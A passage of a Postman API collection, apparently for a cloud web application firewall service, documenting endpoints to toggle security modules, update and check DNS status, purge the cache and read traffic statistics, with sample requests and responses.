 },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"inherited\": \"disable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"CachingAndCompression\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\",\n    \"inherited\": \"disable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"globaltrustlistparameter\",\n    \"status\": \"enable\"\n  }\n]"},{"id":"393241e3-5ead-41ae-bbb9-4ae11fcf3434","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer2 {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","modules"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:15:08 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"1df13266-8bf7-11e9-a369-c56c37d070a0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"bGFtfElJSQ0FR5Q="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"d2d89872-73e0-42d7-bf26-9d038665d7b9"},{"name":"Update Endpoint Modules","id":"295246bf-d13a-4623-95c3-ebf8729587d6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"[\n  {\n    \"id\": \"attack_log_export\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CachingAndCompression\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"globaltrustlistparameter\",\n    \"status\": \"enable\"\n  }\n]"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","description":"<p>Modify Modules configuration of the Endpoints.\nA sample body is added to the request that conforms to the following JSON schema: </p>\n<ul>\n<li>ID: The ID of the module</li>\n<li>status: If the module is enabled or disabled</li>\n<li>inherited: If the module uses the configuration which is  inherited from the template</li>\n</ul>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-python\">[\n  {\n    \"id\": \"attack_log_export\",\n    \"status\": \"disable\",\n    \"inherited\": \"disable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"inherited\": \"disable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"CachingAndCompression\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\",\n    \"inherited\": \"enable\"\n  },\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\",\n    \"inherited\": \"disable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\",\n    \"inherited\": \"enable\"\n  }\n]\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","modules"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2daf0712-c170-432d-8134-20e997c01511","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"attack_log_export\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"knownattacks\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"AnomalyDetection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"informationleakage\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"CookieSecurity\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"FileProtection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"httpheadersecurity\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"csrfprotection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"mitbprotection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"RequestLimits\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"urlaccess\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"IPProtection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"botdetection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"ddosprevention\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"customrule\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"WebSocketSecurity\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"APIProtection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"APIGateway\",\n        \"status\": \"enable\"\n    },\n    {\n        \"id\": \"MobileAPIProtection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"JsonProtection\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"XMLProtectionPolicy\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"account_takeover\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"RewritingRequests\",\n        \"status\": \"disable\"\n    },\n    {\n        \"id\": \"globaltrustlistparameter\",\n        \"status\": \"enable\"\n    }\n]","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","modules"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:37:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"32"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2edd2386-8bfa-11e9-bee8-41af2caca11e"},{"key":"x-amz-apigw-id","value":"bGI7PGgqyQ0FrIQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Ilegal request parameter: missed modules ids: {'CachingAndCompression'}\"\n}"},{"id":"727e3777-5887-4b51-8c63-5f633c3d2254","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"[\n  {\n    \"id\": \"attack_log_export\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CachingAndCompression\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"globaltrustlistparameter\",\n    \"status\": \"enable\"\n  }\n]","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","modules"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:35:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"56"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f01a3e4b-8bf9-11e9-82e3-2bab70f3e16b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGIqyFGRyQ0FWEg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff2178-4ea52ed8cd4b26a001376fc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Module configuration changed successfully.\"\n}"}],"_postman_id":"295246bf-d13a-4623-95c3-ebf8729587d6"},{"name":"Update Application DNS","id":"70a9f532-0085-477b-9d74-c76ac154080d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","description":"<p>Update DNS status of the Endpoints.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <strong>Request format</strong> <strong>section for API key secret details.</strong></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id"],"host":["api","fortiweb-cloud","com"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"id":"2e808ed4-e00d-42ae-8962-72033c567b46","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"f2b1c5f8-2203-4ffd-98c7-a9d923b1b26e","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:37:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"32"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2edd2386-8bfa-11e9-bee8-41af2caca11e"},{"key":"x-amz-apigw-id","value":"bGI7PGgqyQ0FrIQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Get application status failed.\"\n}"},{"id":"5d0198e3-1231-455d-bcaa-daae76206bb1","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"key":"ep_id","value":null}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:35:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"56"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f01a3e4b-8bf9-11e9-82e3-2bab70f3e16b"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amz-apigw-id","value":"bGIqyFGRyQ0FWEg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff2178-4ea52ed8cd4b26a001376fc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{ \n    \"detail\": \"successfully\", \n    \"result\": {\n        \"ep_id\": \"2913489081\", \n        \"ep_cname\": \"az.fortiweb-cloud-test.52935.fortiweb-cloud-azure.net\", \n        \"dns_status\": 0, \n        \"update_time\": \"UTC-2022-04-06 16:56:20\", \n        \"domain_status\": {\n            \"rg-azure30.fortiweb-cloud-test.com\": {\n                \"dns_status\": 0, \n                \"current_record\": {\n                    \"CNAME\": \"N/A\", \"A\": \"N/A\"\n                    }\n                }\n            }, \n        \"acme_info\": [\n                {\n                \"cname_name\": \"_acme-challenge.az.fortiweb-cloud-test.com\", \n                \"cname_value\": \"_acme-challenge.az.fortiweb-cloud-test.52935.fortiwebcloud.net\",\n                \"status\": false\n                }\n            ],       \n            \"naked_domain_ips\": {\"A\": [\"20.50.222.94\", \"20.54.176.184\"]}\n    }\n}"}],"_postman_id":"70a9f532-0085-477b-9d74-c76ac154080d"},{"name":"Get Application DNS Status","id":"cf3998b0-4dfe-441a-8366-792015ead90b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","description":"<p>Get DNS status of the Endpoints manually.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <strong>Request format</strong> <strong>section for API key secret details.</strong></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id"],"host":["api","fortiweb-cloud","com"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"id":"2e808ed4-e00d-42ae-8962-72033c567b46","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"813114b6-e286-464a-9750-ece80fbeb8ce","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:37:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"32"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2edd2386-8bfa-11e9-bee8-41af2caca11e"},{"key":"x-amz-apigw-id","value":"bGI7PGgqyQ0FrIQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Get application status failed.\"\n}"},{"id":"c47b6331-205b-4e15-940b-150a31624497","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id?dns_resolve=true","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id"],"query":[{"key":"dns_resolve","value":"true"}],"variable":[{"key":"ep_id","value":null}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:35:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"56"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f01a3e4b-8bf9-11e9-82e3-2bab70f3e16b"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amz-apigw-id","value":"bGIqyFGRyQ0FWEg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff2178-4ea52ed8cd4b26a001376fc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{ \n    \"detail\": \"successfully\", \n    \"result\": {\n        \"ep_id\": \"2913489081\", \n        \"ep_cname\": \"az.fortiweb-cloud-test.52935.fortiweb-cloud-azure.net\", \n        \"dns_status\": 0, \n        \"update_time\": \"UTC-2022-04-06 16:56:20\", \n        \"domain_status\": {\n            \"rg-azure30.fortiweb-cloud-test.com\": {\n                \"dns_status\": 0, \n                \"current_record\": {\n                    \"CNAME\": \"N/A\", \"A\": \"N/A\"\n                    }\n                }\n            }, \n        \"acme_info\": [\n                {\n                \"cname_name\": \"_acme-challenge.az.fortiweb-cloud-test.com\", \n                \"cname_value\": \"_acme-challenge.az.fortiweb-cloud-test.52935.fortiwebcloud.net\",\n                \"status\": false\n                }\n            ],       \n            \"naked_domain_ips\": {\"A\": [\"20.50.222.94\", \"20.54.176.184\"]}\n    }\n}"}],"_postman_id":"cf3998b0-4dfe-441a-8366-792015ead90b"},{"name":"Purge Cache","id":"b8123197-25fe-47cc-8716-07d78c432f6e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/cache_purge","urlObject":{"protocol":"https","path":["v1","application",":ep_id","cache_purge"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"c83df731-1cc0-4bd1-8099-f3bf9c9c200f","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"any","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"80adc9b3-36b0-4acf-9227-b403935371f7","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/cache_purge","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","cache_purge"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Cache purge operation has been issued, which takes 5 minutes to take effect\"\n}"}],"_postman_id":"b8123197-25fe-47cc-8716-07d78c432f6e"},{"name":"Get Traffic Log Stats Copy","id":"4ef36305-b91f-40c7-abca-f22f4b1be710","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/dashboard/traffic_stat?count={{count}}&timespan={{timespan}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","dashboard","traffic_stat"],"host":["api","fortiweb-cloud","com"],"query":[{"description":{"content":"<p>return the first N countries data</p>\n","type":"text/plain"},"key":"count","value":"{{count}}"},{"description":{"content":"<p>the time range to show the statistic</p>\n","type":"text/plain"},"key":"timespan","value":"{{timespan}}"}],"variable":[{"id":"325a3b29-dd5f-4270-acd5-f666d1f7b8ff","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"5c143785-8c7c-459b-b365-aed5e39bf8c0","name":"Get 10 countires 24 hour record","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/dashboard/traffic_stat?count=10&timespan=last_24_hours","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","dashboard","traffic_stat"],"query":[{"key":"count","value":"10","description":"return the first N countries data"},{"key":"timespan","value":"last_24_hours","description":"the time range to show the statistic"}],"variable":[{"key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"United States\": {\n        \"average_http_request_bytes\": 1892633789,\n        \"average_http_response_bytes\": 3661572138,\n        \"total_bytes\": 5554205927\n    },\n    \"Australia\": {\n        \"average_http_request_bytes\": 141763441,\n        \"average_http_response_bytes\": 314340558,\n        \"total_bytes\": 456103999\n    },\n    \"India\": {\n        \"average_http_request_bytes\": 136768962,\n        \"average_http_response_bytes\": 268361880,\n        \"total_bytes\": 405130842\n    },\n    \"Canada\": {\n        \"average_http_request_bytes\": 96618454,\n        \"average_http_response_bytes\": 185978294,\n        \"total_bytes\": 282596748\n    },\n    \"United Kingdom\": {\n        \"average_http_request_bytes\": 47802081,\n        \"average_http_response_bytes\": 94220944,\n        \"total_bytes\": 142023025\n    },\n    \"France\": {\n        \"average_http_request_bytes\": 46867923,\n        \"average_http_response_bytes\": 90788160,\n        \"total_bytes\": 137656083\n    },\n    \"Germany\": {\n        \"average_http_request_bytes\": 40301141,\n        \"average_http_response_bytes\": 100380142,\n        \"total_bytes\": 140681283\n    },\n    \"China\": {\n        \"average_http_request_bytes\": 43631326,\n        \"average_http_response_bytes\": 90603968,\n        \"total_bytes\": 134235294\n    },\n    \"Japan\": {\n        \"average_http_request_bytes\": 33241889,\n        \"average_http_response_bytes\": 64323196,\n        \"total_bytes\": 97565085\n    },\n    \"Singapore\": {\n        \"average_http_request_bytes\": 32296236,\n        \"average_http_response_bytes\": 62012382,\n        \"total_bytes\": 94308618\n    }\n}"}],"_postman_id":"4ef36305-b91f-40c7-abca-f22f4b1be710"},{"name":"Get Traffic Log IP Statics Copy","id":"8e7421d8-e460-4b09-9a78-6fcf528cbbbb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic 